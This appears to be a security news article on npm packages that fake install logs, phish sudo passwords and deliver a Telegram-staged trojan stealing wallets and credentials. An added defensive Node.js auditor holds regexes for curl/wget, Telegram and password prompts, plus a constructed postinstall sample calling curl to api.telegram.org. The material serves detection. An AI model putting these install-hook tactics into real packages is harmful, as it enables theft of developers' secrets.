
A Sneaky npm Scam That Steals Crypto and Secrets

Worldwide | Tuesday, March 24, 2026

Security researchers have uncovered a set of npm packages that pose as harmless developer tools but secretly steal cryptocurrency wallets and personal data.

  • Attackers: Operate under the alias “mikilanjillo,” releasing seven distinct packages.
  • Tactics: Each package pretends to download additional modules, prints fake install logs, and inserts random pauses so that the install looks normal to the user.
  • Privilege Escalation: The package then shows a fake “permission error” and prompts for the user's sudo or admin password. If the password is supplied, it quietly fetches a second‑stage downloader that contacts a Telegram channel.
  • Delivery: The Telegram channel supplies the final malicious payload together with the key needed to decrypt it.
  • Outcome: The payload is a remote‑access trojan that steals wallet keys, browser passwords, SSH keys and other sensitive data, and polls a remote command‑and‑control server for further instructions.
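As an added example (not code from the article, the researchers it cites, or the packages it describes), the following Node.js script audits an npm package's install-time lifecycle hooks for the behaviours listed above: fabricated npm-style log output, long artificial delays, a prompt for a sudo or admin password, a download at install time, and contact with Telegram. The package layout, the placeholder name demo-tool and the install script it contains are constructed for this illustration and are not any of the real packages.

```javascript
// Added example, not code from the article or the packages it describes.
// Heuristic audit of an npm package for the install-time tactics described
// above. The package layout, the name "demo-tool" and the install script
// below are constructed for this illustration.

// Lifecycle hooks that npm runs automatically during `npm install`.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Each indicator maps a regex to the tactic it is meant to catch.
const INDICATORS = [
  {
    id: "fake-install-log",
    re: /console\.log\([^)]*(npm (WARN|ERR!|info)|added \d+ packages)/i,
    why: "prints fabricated npm-style progress output",
  },
  {
    id: "artificial-delay",
    re: /setTimeout\([\s\S]*?,\s*\d{4,}\s*\)|\bsleep\s+\d+/i,
    why: "inserts long pauses so the install looks like real work",
  },
  {
    id: "privilege-prompt",
    re: /\b(sudo|administrator|admin)\b.*\b(password|passwd)\b/i,
    why: "asks the user for a sudo or admin password",
  },
  {
    id: "remote-download",
    re: /\b(curl|wget)\b|https?:\/\/[^\s'"]+\.(?:sh|exe|bin|zip)\b/i,
    why: "fetches an additional payload at install time",
  },
  {
    id: "telegram-contact",
    re: /api\.telegram\.org|\bt\.me\//i,
    why: "contacts Telegram, used in this campaign for staging and exfiltration",
  },
  {
    id: "obfuscation",
    re: /\beval\(|new Function\(|Buffer\.from\([^)]*["']base64["']\)/,
    why: "decodes or evaluates hidden code",
  },
];

// Return the indicators that fire on one script or command string.
function scanSource(source) {
  return INDICATORS.filter((ind) => ind.re.test(source)).map((ind) => ({
    id: ind.id,
    why: ind.why,
  }));
}

// Audit an unpacked package given in memory as { packageJson, files },
// where files maps a relative path to its source text.
function auditPackage(pkg) {
  const scripts = (pkg.packageJson && pkg.packageJson.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (!command) continue;
    // The hook command itself can carry the indicator ("curl ... | sh").
    for (const f of scanSource(command)) findings.push({ hook, file: "package.json", ...f });
    // Follow "node <file>" to the script that actually runs.
    const m = /\bnode\s+([^\s&|;]+)/.exec(command);
    if (m && Object.prototype.hasOwnProperty.call(pkg.files, m[1])) {
      for (const f of scanSource(pkg.files[m[1]])) findings.push({ hook, file: m[1], ...f });
    }
  }
  return { lifecycleHooks: LIFECYCLE_HOOKS.filter((h) => scripts[h]), findings };
}

// Constructed sample exhibiting the tactics from the article; not a real package.
const SAMPLE_PACKAGE = {
  packageJson: { name: "demo-tool", version: "1.0.0", scripts: { postinstall: "node scripts/setup.js" } },
  files: {
    "scripts/setup.js": [
      'console.log("npm info fetching optional modules...");',
      'setTimeout(() => console.log("added 12 packages"), 4000);',
      'console.error("EACCES: permission denied. Enter your sudo password to continue:");',
      'require("child_process").exec("curl -s https://api.telegram.org/bot<token>/getFile");',
    ].join("\n"),
  },
};

// A package with no lifecycle hooks produces no findings.
const CLEAN_PACKAGE = {
  packageJson: { name: "clean-lib", version: "2.0.0", scripts: { test: "node test.js" } },
  files: { "test.js": 'console.log("ok");' },
};

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(auditPackage(SAMPLE_PACKAGE), null, 2));
}
```

Heuristics like these only flag a package for manual review: legitimate native modules also run postinstall scripts, and a real payload may be obfuscated in ways the simple obfuscation pattern above will miss. A cheaper first line of defence is to stop npm from running lifecycle scripts during installation at all (`npm install --ignore-scripts`, or `ignore-scripts=true` in .npmrc) and inspect the unpacked package before running anything from it.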

Similarities to GhostClaw

Security researchers note resemblances to the GhostClaw threat, which also uses GitHub repositories and AI tools to conceal malicious code. Both campaigns abuse trusted development environments, so developers who install seemingly useful libraries become easy targets.

Data Exfiltration & Monetization

  • Data Storage: Stolen data is sent to Telegram bots and tracked via a smart contract on the Binance Smart Chain.
  • Revenue Streams:
    1. Selling stolen credentials.
    2. Redirecting users to affiliate links.

The Bigger Picture

This trend illustrates how cybercriminals are evolving beyond classic package‑registry tricks, embedding malicious code in popular open‑source projects. The result is a harder‑to‑detect threat that leverages developer trust to gain access and monetize stolen data.

Actions